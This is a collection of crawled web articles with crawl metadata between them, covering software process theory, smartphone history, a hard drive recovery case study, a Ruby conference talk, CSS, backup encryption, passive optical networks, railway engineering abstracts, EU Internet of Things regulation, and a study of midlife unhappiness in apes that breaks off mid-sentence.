Many experts now credit Japan's relentless application of just-in-time (JIT) manufacturing techniques and total quality management (TQM) or agile manufacturing to the automobile industry as opposed to the Fredrick Taylor models of lean manufacturing practiced in the U.S. This shift represented a titanic change in processes, procedures and management techniques. Software organizations struggle to reign in projects by imposing stricter software processes. These processes are based on waterfall or iterative models with phasist structures stemming from Taylorist theories of efficiency. Over the past decade new software processes based on JIT manufacturing principles called agile methodologies have been introduced into the software industry. However, there is huge reluctance in the software industry to make any adjustments even though, currently, all indicators point to something egregiously wrong. This situation in many ways resembles the turning point of the U.S. auto industry from the '70s and early '80s. Stability of Processes Humans successfully control many complex systems under unpredictable and changing conditions. Airplanes dont crash into the ground even when buffeted by gusts of wind, and power stations do not melt down under fluctuation's in power draw. These complex systems are controlled by making measurements and corrections to keep the system in balance. The study of the systematic application of measures and corrections is called 'control theory'. The control of a system depends not only the system's current state but also how the system will respond to corrections or inputs. Control theory defines three categories of stability: Stable: Stable systems resist change. When changes are made to a stable system, the system eventually returns to its starting state. Neutral: Neutral systems respond to inputs in predictable ways. Unstable or non-linear: Complex systems often respond to changes in unpredictable ways. In the real world, most complex systems are non-linear. Many complex systems display stable characteristics when their elements are kept within certain parameters, called an "envelope of control." However, if the threshold is exceeded unpredictable results may happen. Software Process and Control Automobile and passenger aircraft stability are desirable features. However, there are many instances where the desire of a system to return to its stasis point is detrimental. Fighter aircraft, for example, must be able to maneuver quickly to avoid other aircraft or incoming anti-aircraft artillery. Any attempt by the aircraft to return to its stable position, would slow its reflexes. Traditional software engineer processes such as the waterfall model and iterative model are built on Taylor's theories of lean management. These processes are developed on two fundamental assumptions: First, that each stage of the waterfall is progressively more expensive (from specification through implementation) and second, that the process itself is dynamically stable. These processes as a group are called "phasist." The assumption of progressively increasing costs leads to the practice of attempting to fully define requirements and design before beginning implementation. Since changes to the requirements after implementation begins are expensive, system control becomes an exercise in managing change. The stability assumption implies that Gant-style planning tools optimally allocate resources. Gant charts allow resources to be aligned and allocated based on estimated cost through the process of leveling. This process depends on responding linearly to changes in resources, requirements and costs, in other words, the system must be stable or neutral.
<urn:uuid:2beed68b-8ae0-4d9c-b12f-733160ce2bce>
CC-MAIN-2017-04
http://www.cioupdate.com/reports/article.php/3546861/Pivotal-Decisions-Process-Competition-and-Success.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00491-ip-10-171-10-70.ec2.internal.warc.gz
en
0.939196
685
3.171875
3
Smart phone: 30 years in the making - By Kevin McCaney - Jul 08, 2013 Smart phones have become such ubiquitous tools for work and personal business that it’s easy to take them for granted, even only a few years after they first appeared. And they have revolutionized how public-sector agencies do business. But they didn’t just spring from Steve Jobs’ mind — the technology behind them can be traced back to GCN’s beginnings, and further, into government research projects. Here’s a brief look at what’s behind a smart phone’s key components. Camera: NASA developed the concept of a digital camera in the 1960s. Kodak has the first camera in 1975, but in the ‘90s NASA developed new ways of miniaturizing them with the CMOS active-pixel sensor. GPS receiver: The Global Positioning System project was started in 1972, became fully operational in 1995. In 2000, its highest-grade signals were opened up for civil use. Network: The first analog cellular system, now known as 1G, was introduced in 1978. Cell phone use took off in the 1990s with 2G networks. 3G (mobile broadband) appeared in 2001, and by 2011 was giving way to 4G (WiMax and lTE), which uses IP packet switching. Touch screen: The first multitouch device was created at the University of Toronto in 1982. The HP 150, among the first touch-screen computers, appeared the next year. Improvements over the years came with the Apple Newton (1993), Sony’s SmartSkin (2002) and other technologies. Touch screens took a leap forward in 2007 with the first iPhone. For the surface, many phones use Gorilla Glass. System-on-a-chip: Thanks to Moore’s Law (1965) holding true, advances in processor cores, GPUs, and other components means they can be squeezed into a small, handheld form. DRAM: Once the province of PCs, workstations and supercomputers, dynamic random access memory has been showing up in larger doses as smart phones get more sophisticated. According to one study, in 2011, no phone had more than 800M of DRAM; today, 4G, 8G and even 16G are becoming common. Battery: Research into lithium ion batteries dates to the 1970s, but the first prototype was built in 1985 and the first Li-ion battery hit the market in 1991. Its density has tripled since, but that trails far behind advances with other components. Today, most improvements in battery life are credited to more efficient, low-power systems. Power amplifier/PMIC: Two things in the battery’s corner, the power amplifier can extend battery life and speed up data rates, the PMIC is an integrated circuit designed to manage power requirements. Storage: Flash memory cards began appearing in the 1990s, and grew smaller, more capacious and cheaper over the past decade. Today, you can have a smart phone with up to 128G of storage. Sensors: Most smart phones have gyroscopes and accelerometers, and some new models are adding barometers, thermometers and hygrometers (for humidity). NASA began working on miniaturizes microsensors for weather research in 1992. Magic act: To get an idea of just how disruptive smart phones have been, here are a few things they are helping to make disappear: Music players, radios, cameras, video cameras, planners, music and image storage, boarding passes, phone books, rolodexes, instrument tuners, maps, pay phones, calculators, books and, for some users, PCs. Kevin McCaney is a former editor of Defense Systems and GCN.
<urn:uuid:214cbe62-cdf7-47dd-ab12-6b2bb7d4b6b6>
CC-MAIN-2017-04
https://gcn.com/articles/2013/05/30/gcn30-smartphone-30-years-in-the-making.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00573-ip-10-171-10-70.ec2.internal.warc.gz
en
0.94758
783
3.0625
3
When a hard drive starts making unusual clicking noises, it is because the drive’s magnetic read/write heads have run into a problem while attempting to read data from its platters. Although this can happen for a few reasons, in many data recovery cases it is because the read/write heads themselves have failed and caused platter damage. Read/write heads are delicate instruments and are the most common failure points in a hard drive, whether due to physical shock or simply a result of natural wear and tear. In this case, an inspection of the client’s Hitachi desktop hard drive by our cleanroom data recovery engineer Drew showed that the read/write heads on the hard drive were mangled and had caused the drive some significant platter damage. Recovery Type: Desktop Drive Capacity: 1TB Model Name: Deskstar 7K1000.C Model Number: HDS721010CLA632 Manufacture Date: 11/2009 Main Symptom: Hard Drive Clicking, HDD Read/Write Heads Failure, Platter Damage Type of Data Recovered: Pictures, Documents, Outlook Files Data Recovery Grade: 9 Binary Read: 54.5% Clicking Hard Drives Normally, a hard drive’s magnetic read/write heads hover 3 to 5 nanometers above the surface of the platters, a length equivalent to about 60-100 hydrogen atoms arranged end-to-end. While it can be tempting to describe the way a hard drive works by comparing it to a record player, unlike the needle of a record player, at no point are the heads ever meant to make physical contact with the platters. And a hard drive’s platters are meant to be smooth surfaces with none of the grooves you would see on a vinyl record. But when a drive’s heads fail, they can sometimes make contact with the platters’ surfaces and the scratches that result are referred to as platter damage. If a read/write head makes brief contact with the platter, it creates tiny “dings” on the platter’s surface. Prolonged contact between the heads and platters (which are spinning at thousands of revolutions per minute) cuts a circular path of destruction through the magnetic substrate containing all of the data on the drive and makes the platters start to resemble something that does belong on a turntable. Severe Platter Damage – Rotational Scoring This behavior is known as rotational scoring, and severe enough scoring can make data recovery impossible. But there was still plenty of hope for this case. While there was a bit of visible scoring on one surface of the drive’s platters, in cleanroom data recovery cases such as this one where the scoring is not too severe, our engineers can make use of our hard drive platter burnisher. While burnishing the platters cannot restore the sectors that have already been scratched and scraped out of existence by the failed heads, it does clean debris from and smooth out the surfaces of the platters so that a new and functional set of read/write heads will not fall into the same rut as the old, mangled set. After burnishing the hard drive’s platters and swapping in a fresh pair of read/write heads, our cleanroom data recovery engineers were able to read 13.3% of the hard drive’s total binary sectors and 100% of the drive’s file definitions. Because all of the file definitions on this hard drive had been read, we could be certain that we knew about all of the files on the disk—even ones we hadn’t fully recovered yet. At this point, 83.2% of the client’s files had been fully recovered. We presented a preliminary list of files to the client at this point before continuing with our data recovery efforts, and after sending the hard drive back to our cleanroom and replacing the drive’s read/write heads one more time, we were able to read 54.5% of the drive’s binary sectors in total and 95.1% of the client’s files. Repairing the PST Like many of the clients we see, the owner of this hard drive stored their email archives in an Outlook PST file. The client’s most recent PST file on the drive took up just over 20 gigabytes of disk space. Even after placing two new sets of read/write heads in the failed hard drive, our engineers were unable to completely recover the PST file, because some of the sectors that had been destroyed by the drive’s failed heads just happened to be where a portion of that large PST file lived on the disk. This didn’t mean the client’s email archive was unusable, however. We had recovered a significant enough amount of the PST file’s sectors that our logical engineers were able to repair the file. While there was still some data missing from the file, the client would still be able to open it, see everything in the email archive our engineers were able to recover, and continue to archive their future emails. The client was pleased with the results, and our engineers rated this cleanroom data recovery case a 9 on our ten-point scale.
<urn:uuid:8db0e62e-19aa-47e7-bad9-22106f3575af>
CC-MAIN-2017-04
https://www.gillware.com/blog/data-recovery/case-study-hitachi-platter-damage/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00141-ip-10-171-10-70.ec2.internal.warc.gz
en
0.956988
1,090
2.6875
3
We often fear what we do not know. For many IT admins, this is Ruby code. JNUC session presenter, Chris Lasell, was on hand today to help provide clarity and ultimately alleviate users’ apprehension of coding in Ruby. He started with some familiar names: Python, Perl, Advanced Bash, etc., and clarified that attendees already understood data types, conditionals and loops. Then Lasell introduced gem – the command for installing and working with Ruby packages. Next he discussed irb, or interactive Ruby, a shell where users type Ruby code. “It’s useful for testing your code as you write, or for performing one-off tasks,” he explained. “’Require’ tells Ruby to read and execute some pre-written code.” Take a look: > require ‘intro-ruby’ To keep it simple, think of everything in Ruby as an object. “Objects equal nouns,” Lasell explained. He added that there are many kinds of objects, like Strings, Integers, each with different attributes and abilities. Think of: Kind = Class. And every action is a method. So, methods equal verbs, or functions. They make objects do things, like retrieving attributes and performing actions. Methods are called by sending the name to an object via a dot at the end. And different classes have different methods. => NoMethodError: undefined method ‘capitalize’ for 15:Fixnum Things to note about methods: - Some work as-is - Some require parameters - Parens are (usually) optional - Each one’s documentation will tell you how to use it Lasell added, “Because methods return values, method calls can be chained. And some methods work with no target, seemingly.” The session dove into detail about variables and constants, quoting strings, and string interpolation before looking at symbols, arrays and hashes. “Ruby comes with many classes,” Lasell recapped. “Some are immediately available in the core, and some need to be loaded in by requiring a library.” Or, he excitedly announced, you can write your own. Jam packed with information, the session continued a deep dive into the depths of Ruby. From modules to iterators, and everything in between, Lasell shared examples of how everything works, sharing code along the way. He also explained how Ruby works with the JSS REST API, giving the advice, “Be sure the user has enough permissions!” The discussion included key bits of information like: - To delete, call the .delete method, and it happens immediately - Extension Attributes can return current values - To create an object not yet in the JSS, use “id: :new” and provide at least a name Lassel ended with a treat – going beyond the code. He briefly explained Core Library, Standard Library, Gems and Resources. While attendees may not yet be proficient with Ruby, they got a glimpse into the not-so-scary code and saw how it could be used to simplify API access. Next steps – go forth and conquer.
<urn:uuid:8d978c25-c618-40be-8a2d-b0d705c0500c>
CC-MAIN-2017-04
https://www.jamf.com/blog/alleviate-the-apprehension-of-coding-in-ruby/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00141-ip-10-171-10-70.ec2.internal.warc.gz
en
0.917728
678
2.9375
3
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. What is it? Cascading Style Sheets (CSS) offers a way of adding styles, such as fonts and colours, to web documents. CSS enables presentation to be separated from content to cope with the different platforms on which web pages are displayed. According to website accessibility expert Jakob Nielsen, "Web style sheets are cascading, meaning that the site's style sheet is merged with the user's style sheet to create the ultimate presentation. "These differences make it important that web style sheets are designed by a specialist who understands the many ways the result may look different than what is on his or her own screen." Style sheets may be external, meaning they can be specified once and applied to all the documents on a website, or embedded within a particular document. Where did it originate? CSS began life in 1994 at Cern, the cradle of the web, when H†kon Wium Lie published the first draft of cascading HTML style sheets. He had the backing of HTML3.0 architect Dave Raggett, who realised that HTML needed a purpose-built page description mechanism. In February 1997 CSS got its own World Wide Web Consortium (W3C) working group. The first commercial browser to support CSS was Microsoft's Internet Explorer 3. What is it for? Different style sheets arrive in a series, or cascade, and any single document can end up with style sheets from multiple sources, including the browser, the designer and the user. Cascading order sorts out which set of rules are to influence the presentation. What makes it special? CSS gives a greater level of control over how work is presented than with HTML. How difficult is it to master? Style sheets can either be hand-written using a text editor or with one of the growing number of web design tools which support CSS. The W3C CSS home page has a list of these tools which include Dreamweaver, Adobe Golive and Homesite. You do not need to know CSS syntax but those who do can fine-tune their style sheets. Where is it used? CSS is currently the most widely supported way of styling web documents. Not to be compared with... Cascading system failures - the impact of the collapse of one part of an infrastructure on the next. What systems does it run on? CSS is supported by most current browsers and web design tools. Not many people know that... "CSS is now being taken up, but HTML is in danger again," said Bert Bos, W3C's style sheet activities co-ordinator. What is coming up? CSS3, six years in the making, promises to be much simpler to use than CSS2/.2.1. You should not need to spend much money learning CSS. The World Wide Web Consortium has comprehensive links to tutorials, how-to articles and books by the likes of H†kon Wium Lie, Bert Bos, Dave Raggett and Jakob Nielsen. Most date back a few years, but remember that the current level, CSS2, has been around since 1997. Rates of pay CSS is used by web designers but also sought in software developers, testers and technical authors. Rates vary accordingly.
<urn:uuid:6faa1dd0-657d-49ea-8f51-54e45915e06d>
CC-MAIN-2017-04
http://www.computerweekly.com/news/2240056970/Cascading-Style-Sheets-separate-presentation-from-website-content
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00446-ip-10-171-10-70.ec2.internal.warc.gz
en
0.932556
696
3.25
3
Pre Computers Era This can be termed as ‘pen and paper’ era. It witnessed the building of the foundation. The concept of numbers became concrete. The zero was invented by Brahmagupta or Aryabhata depending on which way you look at it. The number systems evolved. The earliest known tool used in computation was the Abacus and it is thought to have been invented in 2400 BC. A number of devices based on mechanical principles were invented to help in computing leading to even analog computers. The computational theories also evolved with the advent of logarithms etc. The concept of using digital electronics for computing leading to modern computers is recorded around 1931. Alan Turing modelled computation to lead to the well-known Turing Machine. The ENIAC was the first electronic general purpose computer, announced to the public in 1946. Since then the computers have come a long way. There are super computers. There are a variety of devices like mainframes, servers, desktops, laptops, mobiles etc. There are specialized hardware like gateways, routers, switches etc. for networking These enabled the culmination into internet and the World Wide Web as we know it. Storage arrays for all the storage related capabilities including snapshots, backups, archival etc. There are Application Specific Integrated Circuits (ASIC) so on and so forth. Software Defined Era Soon enough this hardware started getting driven by software. The software started getting more and more sophisticated. It evolved over paradigms like multi-tier architecture, loosely couple system, off-host processing etc. There was advent in the area of virtualization A lot of concepts in computing could be abstracted easily at various levels. This enabled a lot of use cases. E.g. routing-logic moved to software, and hence networks could be reconfigured on the fly enabling migration of servers / devices on response to user / application requirements. The tiered storage can be exposed as a single block store as well as file system store at the same time. It gives capability of laying out the data efficiently in the backend without compromising the ease of its management effectively from a variety of applications. The cloud started making everything available everywhere for everyone. The concepts like Software Defined Networking (SDN) Software Defined Storage (SDS) leading to Software Defined Everything (yes, some people have started coining such a term that you will start seeing widely soon enough). Hardware is getting commoditized. There is specialized software on the rise addressing the needs. It is still not clear what will replace software. However some trends and key players have already started to emerge in this direction. There can be a number of components like open source readily available as building blocks. One might have to just put them together for solving the variety of problems without writing much code. Computing has moved away from “computing devices” into general-purpose common devices like watches, clothing, cars, speakers, even toasters etc. Every device is becoming intelligent. The hardware ecosystem is more or less commoditized already, but software is also along the same path. Witness the proliferation of Openstack or IoT platforms for example. One might have to simply configure them to address the needs. E.g. Openstack cinder can be configured to clone volumes for creating test-dev environments efficiently. IoT can make a production plant efficient in real time by continuous monitoring, re configuration and management of its resources. It could be Docker containers that one has to only deploy for plug and play to have complete solutions in play. The hand writing recognition, voice commanded devices can lead to complete working solution on a matter of thought! The machine learning can provide already fully functional machines like smart cars etc. Who knows, a day might come when without doing anything, everything will be achieved even through thin air so to speak! At this time it might sound like a wild stretch of imagination but just quickly reflect over the evolution of computing so far. It might take a really long time to get there. In fact, it might be time for no one making such posts but just a matter of making some Google searches, looking around with open eyes, feeling it with all the senses for everyone to have already grasped the gist of the message!
<urn:uuid:8453c4bd-7f75-4348-b7a6-eebe11d57301>
CC-MAIN-2017-04
http://gslab.com/blogs/tags/tag/sdn
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281426.63/warc/CC-MAIN-20170116095121-00078-ip-10-171-10-70.ec2.internal.warc.gz
en
0.952147
871
3.671875
4
Encryption uses a mathematical algorithm that transforms source information into a non-readable cipher text. The goal of backup encryption is to make data unintelligible to unauthorized readers and extremely difficult to decipher when attacked. Data that is backed up over the Internet must be encrypted before the first bit leaves your organization and travels over the WAN (backup encryption in flight). When the data arrives to its destination, it should remain encrypted as well (backup encryption at rest). Backup encryption both in flight and at rest ensures that backups are secure, both across the Internet and in the backup repository itself. NAKIVO Backup & Replication uses AES 256 encryption, which is the de facto worldwide encryption standard that secures online information and transactions by the likes of financial institutions, banks, and e-commerce sites. Backup encryption in flight is performed by a pair of Transporters. The Transporter is a component of NAKIVO Backup & Replication that performs all of the data protection and recovery tasks including data read, compression, deduplication, encryption, transfer, write, verification, granular and full VM recovery, and so on. The source Transporter for the offsite backup encrypts and sends the encrypted data. The target transporter receives and decrypts data. For example, when you send backup copies over the WAN to an offsite location, the Transporter installed in the source site compresses and encrypts VM data before transferring it over WAN. Then, the Transporter installed in the Target site receives and unencrypts the data prior to writing it to the Backup Repository. It is equally important for the data at rest to be secured by encryption. NAKIVO Backup and Replication provides the ability to encrypt backup repositories so that backup data at rest, housed in the repository itself, is secure. With the added benefits of in flight and at rest data encryption, NAKIVO Backup & Replication not only ensures your data is safe but also secure.
<urn:uuid:6aefad58-c705-492f-8fea-f98d3d052dab>
CC-MAIN-2017-04
https://www.nakivo.com/features/backup-encryption.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00198-ip-10-171-10-70.ec2.internal.warc.gz
en
0.915956
409
2.859375
3
PON ( Passive Optical Network) refers to the optical distribution network does not contain any electronic device and electronic power, optical distribution network (ODN) all by the optical splitter and other passive components, without the need for expensive electronic equipment, is a form of fiber-optic access network. PON reduces the amount of fiber and central office equipment required compared with point-to-point architectures. A PON consists of an optical line terminal (OLT) at the service provider’s central office and a number of optical network units (ONUs) near end users. In OLT/ONU between the optical distribution network includes optical fiber and passive optical splitter or Fiber Optic Coupler. An OLT, generally an Ethernet switch, router, or multimedia conversion platform, is located at the central office (CO) as a core device of the whole EPON system to provide core data and video-to-telephone network interfaces for EPON and the service provider. ONUs are used to connect the customer premise equipment, such as PCs, set-top boxes (STBs), and switches. Generally placed at customer’s home, corridors, or roadsides, ONUs are mainly responsible for forwarding uplink data sent by customer premise equipment (from ONU to OLT) and selectively receiving downlink broadcasts forwarded by OLTs (from OLT to ONU). An ODN consists of optical fibers, one or more passive optical splitters (POSs), and other passive optical components. ODNs provide optical signal transmission paths between OLTs and ONUs. A POS can couple uplink data into a single piece of fiber and distribute downlink data to respective ONUs. There are two passive optical network technologies: Ethernet PON (EPON) and gigabit PON (GPON). EPON and GPON are applied in different situations, and each offers its own advantages in subscriber access networks. EPON focuses on FTTH applications while GPON focuses on full service support, including both new services and existing traditional services such as ATM and TDM. EPON is a Passive Optical Network which carries Ethernet frames encapsulated in 802.3 standards. It is a combination of the Ethernet technology and the PON technology in compliance with the IEEE 802.3ah standards issued in June, 2004. A typical EPON system consists of three components: EPON OLT, EPON ONU and EPON ODN. It has many advantages, such as lower operation and maintenance costs, long distances and higher bandwidths. GPON utilizes point-to-multipoint topology. GPON standard differs from other PON standards in that it achieves higher bandwidth and higher efficiency using larger, variable-length packets. And GPON is generally considered the strongest candidate for widespread deployments. GPON has a downstream capacity of 2.488 Gb/s and an upstream capacity of 1.244 Gbp/s that is shared among users. There are also many differences between EPON and GPON. EPON, based on Ethernet technology, is compliant with the IEEE 802.3ah Ethernet in the First Mile standard that is now merged into the IEEE Standard 802.3-2005. It is a solution for the “first mile” optical access network. GPON, on the other hand, is an important approach to enable full service access network. Its requirements were set force by the Full Service Access Network (FASN) group, which was later adopted by ITU-T as the G.984.x standards–an addition to ITU-T recommendation, G.983, which details broadband PON (BPON). Both EPON and GPON are accepted as international standards. They cover the same network topology methods and FTTx applications, incorporate the same WDM technology, delivering the same wavelength both upstream and downstream together with a third party wavelength. PON technology provides triple-play, Internet Protocol TV (IPTV) and cable TV (CATV) video services.
<urn:uuid:36a003b5-eaaf-45dd-9e8d-05774ffd0e9d>
CC-MAIN-2017-04
http://www.fs.com/blog/epon-and-gpon-of-passive-optical-network.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00134-ip-10-171-10-70.ec2.internal.warc.gz
en
0.932825
825
3.25
3
Zeng Q.-Y.,China Railway Siyuan Survey and Design Institute Group Co. Yantu Gongcheng Xuebao/Chinese Journal of Geotechnical Engineering | Year: 2010 On January 21 2006, the water and mud popped out from the 978 high-pressure and water-filled cavern at the exit to Maluqing tunnel. The water amount was instantaneously 300 thousand cubic meter per hour. For ensuring the safety of construction and traffic, a 4700 m-drainage tunnel was built to release the karst water in the Maluqing tunnel. To release the karst water includes the following 4 stages: water release by boring, water release by high place hole, water release by low place drainage tunnel, automatic release of water, mud and rock due to strong rainfall. The water release mechanism is summarized based on the measured data. To release water by boring can reduce the water pressure, but the water release ability is limited because of the boring blockage. To release water by the high place hole has certain effectiveness, but, if the high place hole encounteres the cavern, contineous construction will be difficult so as to have impact on the water release ability. As the drainage tunnel connects with the cavern, when the rainfall is strong, the water, mud and rock release from the drainage tunnel. So, the cavern is ceaselessly dredged, and the function of water release is satisfied. The maximum water release is corresponding to the rainfall. Source Zhu J.,China Railway Siyuan Survey and Design Institute Group Co. Journal of Railway Engineering Society | Year: 2013 Research purposes: In recent years, people has begun to focus on the influence of lightning on the electrified railway. Especially the lighting activity in the heavy lightning areas brings the serious harm to the electrified railway in these areas. The lightning protection technology is an important for ensuring the reliability of the power supply system of the electrified railway. So the measures for the lightning protection must be strengthened and the lighting protection technology must be enhanced. Research conclusions: The three lines of defense should be built for the lighting protection for the substation to avoid the hit of the lighting strike to the substation devices, and the three level prevention should be built for avoiding the appearances of the failures of the low-voltage devices of the substation caused by the rising earth potential or the induced voltage and the induced current. Also the measures should be taken for the earthing system to make it in the good working state The lighting protection engineering for the substation should have the means mentioned above. Source Liu Q.-J.,China Railway Siyuan Survey and Design Institute Group Co. Wuhan Ligong Daxue Xuebao/Journal of Wuhan University of Technology | Year: 2014 Taking Jijiang Yangtze river bridge in Chongqing as an example, the coupled vibration of wind, vehicle, and bridge of light rail-cum-road suspension bridges was studied. First of all, using the theory that the total potential energy of elastic system in dynamics is constant and the matrix "reserved seats" law, the dynamic equations of the suspension bridge and the vehicle-bridge coupling system were established respectively. Then, for the Jijiang Yangtze river bridge, the random wind field on the bridge site was simulated. Using the numerical wind tunnel technology, three component coefficients of train, girder and train-girder system model were calculated. On this basis, the coupled vibration of wind, vehicle, and bridge for the Jijiang Yangtze river bridge was carried out. The experimental results show that, when the wind speed is not more than 25 m/s, the designed bridge can meet the requirements of train safety and comfort, and the requirements satisfy the train operation control procedures standards made by China in case of high winds. It is shown that the influence of the bridge on the train operation under strong winds does not become a control factor for the whole railway line. Source Luo S.,China Railway Siyuan Survey and Design Institute Group Co. | Rao S.,China Railway Siyuan Survey and Design Institute Group Co. Zhongguo Tiedao Kexue/China Railway Science | Year: 2011 According to the mechanical characteristics of the curve cable-stayed bridge of four-track railway, the structure design and research on the cable, girder, bridge towers and foundation construction were launched by space bar finite element static analysis method in terms of the cable-stayed bridge architecture, the bridge stiffness, shrinkage and creep, and geometric nonlinearity etc. FEM analysis was used to study the stress distribution of the orthotropic steel box decks under the combined effect of the vertical and horizontal bending, shear lag and torsion warping. With FEM simulation, the local stress analysis and structure research were carried out on several aspects, such as the joint section of steel box girder and the prestressed concrete beam, the consolidation area between the main girder and the crossbeam of the bridge tower as well as the upper and lower steel anchor boxes for stay cable. Vehicle-bridge coupled time-varying analysis method was adopted to study the train running dynamic performance. Response spectrum method and seismic time history analysis method were used to study and analyze the seismic performance and seismic measures of the structure. Analyses show that about 3 m distance between the diaphragm and the web plates adopted for the steel box girder plays important role in improving the main beam structure in the curve cable-stayed bridge of four-track railway. Good train operation performance indicates that 1/900 deflection-span ratio adopted for the bridge to control the structural stiffness is more reasonable. E-type steel damping bearing has improved the seismic performance of the bridge. Source Gong Y.-F.,China Railway Siyuan Survey and Design Institute Group Co. | Zhang J.-R.,Southwest Jiaotong University | Xu X.-D.,China Railway Siyuan Survey and Design Institute Group Co. | Tang Z.,China Railway Siyuan Survey and Design Institute Group Co. Journal of Railway Engineering Society | Year: 2015 Research purposes: In the dangerous difficult mountainous area, affected by the railway station setting and the contact line fork, there will be multi-line station tunnel and variable section tunnels, even form a super large section tunnel. When the shallow tunnel is located in stratum of completely weathered granite with abundant water, tunnel construction has the following security risks: the topographic and geological conditions are poor, developed groundwater, easy to collapse; Primary support force are large, deformation control is difficult, exit the risk of deformation intrude structure ambit, lose stability and collapse; Tunnel should be taken repeatedly excavation support, difficult force transfer, high security risk of support remove and replace. In view of the domestic and foreign less examples and research on super large cross section shallow tunnel in stratum of completely weathered granite with abundant water, there are less research on it. Based on the practical engineering, the problem is studied in this paper. Research conclusions: This paper summarizes the domestic and foreignnowadays construction technology of super large section tunnel, analyzes the mechanical behavior of tunnel constructive process, establishes measures of advanced support, support parameters of lining and constructive methods, the main conclusions are as follows: (1) The construction of super large section tunnel in stratum of completely weathered granite with abundant water is difficult, high security risk and high cost, should be combined with specific conditions of tunnel engineering to develop practical supporting measures and construction methods. (2) To control primary support deformation and primary supporting measures conversion of super large section tunnel in stratum of completely weathered granite with abundant water, large wall foundation and multiple supporting measures are necessary. (3)In order to control deformation of soft stratum with abundant water, deformation and collapse of super large cross section tunnel, should adopt strong advanced reinforcement and reinforcement measures of tunnel face. (4) The relevant research results can provide reference for the design and construction of the super large section tunnel in soft stratum. © 2015, Editorial Department of Journal of Railway Engineering Society. All right reserved. Source
<urn:uuid:f1f321b2-2d65-4041-a852-02bf9b3ca29a>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/china-railway-siyuan-survey-and-design-group-co-157475/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00528-ip-10-171-10-70.ec2.internal.warc.gz
en
0.933074
1,683
2.765625
3
The European Commission is calling for opinions on how to regulate wirelessly connected devices, as legal experts say the current Data Protection Directive is not up to the job. Digital Agenda Commissioner Neelie Kroes last week launched a public consultation on the so-called "Internet of things" to try to find the right balance between privacy and convenience. "The current directive is certainly not designed with this technology in mind," said Kathryn Wynn, senior associate at legal firm Pinsent Masons, adding that it is likely that a lot of the more intrusive communications (such as alerts to devices or device-tracking) would not be considered to be "personal data" under the existing legislation. Household devices, most obviously smartphones and laptops, are already connected wirelessly but the number of devices that can connect to the Internet is set to grow dramatically in coming years. The Commission estimates that currently the average person has two devices connected to the Internet, but expects this to rise to seven by 2015. This creates a potential minefield for regulators with regard to interoperability and privacy issues. These devices will collect, share and store data. The European Commission wants to ensure an adequate level of control over what can be done with that data. Kroes said she was chiefly concerned with "preserving security, privacy and the respect of ethical values." The new draft Data Protection Regulation, which was published in January, does seek to address some issues relating to newer technology such as location data. But it will not come into force for at least another two years, points out Wynn. "It is likely that the technology will have moved on leaps and bounds by that stage. This is a classic example of the issue that the E.U. Commission is facing; the legislation simply cannot keep up with the pace of technology," she said. The other big question raised by the trend toward connected devices is how to manage interoperability, governance and standards. The E.C. surveycalls for all interested parties to submit their ideas and respond to questions by July 12. The results of the consultation will feed into the Commission's recommendation on the Internet of things, which will be presented by summer 2013.
<urn:uuid:bebba013-62bd-4b18-aff5-aef2eb9a8d61>
CC-MAIN-2017-04
http://www.cio.com/article/2397164/internet/eu-asks-for-help-on-regulating-the-internet-of-things.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00344-ip-10-171-10-70.ec2.internal.warc.gz
en
0.96661
442
2.640625
3
What is Hardware Engineering? Hardware Engineering is the process of designing, developing, testing and producing computer systems and various physical components related to computer systems. With the advent of technology and advances in R&D, the scope of hardware engineering has been expanded to include hardware devices enabling embedded software engineering in non-computer devices. In embedded systems, hardware engineering comprises of the process of design and development of all electronics related hardware such as sensors, processors and controllers. The scope of hardware engineering is limited not just to the designing and development of computer or embedded systems, but also to integrate the various devices for the functioning of the entire business system. With the advent of technology and advances in R&D, hardware engineering is now prevalent in newer fields such as mobile computing and distributed systems, computer vision and robotics, etc.
<urn:uuid:eb3b4d14-9d3d-4534-be74-3dbeebb49bf4>
CC-MAIN-2017-04
https://www.hcltech.com/technology-qa/what-is-hardware-engineering
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00464-ip-10-171-10-70.ec2.internal.warc.gz
en
0.93959
165
3.34375
3
Hopefully for the dignity of their respective species, chimpanzees and orangutans don't embarrass themselves in middle age as so many humans do. But even if they don't resort to comb-overs and chin lifts, it turns out that, like humans, chimpanzees and orangutans can suffer from mid-life crises. A new study published in the Proceedings of the National Academy of Sciences of the USA by an international team of researchers indicated that chimpanzees and orangutans -- who along with humans and gorillas comprise the Great Apes -- follow the same U-shaped pattern of lifetime well-being that features a trough (depression) in middle age sandwiched by high levels of happiness in youth and old age. The research was led by Professor Andrew Oswald from the University of Warwick (England) and psychologist Dr Alex Weiss from the University of Edinburgh (Scotland), who were interested in determining whether the U-pattern of emotional well-being was common among the Great Apes. From the University of Warwick: The authors studied 508 great apes housed in zoos and sanctuaries in the United States, Japan, Canada, Australia and Singapore. The apes' well-being was assessed by keepers, volunteers, researchers and caretakers who knew the apes well. Their happiness was scored with a series of measures adapted from human subjective well-being measures.Professor Oswald said: "We hoped to understand a famous scientific puzzle: Why does human happiness follow an approximate U-shape through life? We ended up showing that it cannot be because of mortgages, marital breakup, mobile phones, or any of the other paraphernalia of modern life. Apes also have a pronounced midlife low, and they have none of those." True, we humans are materialistic and 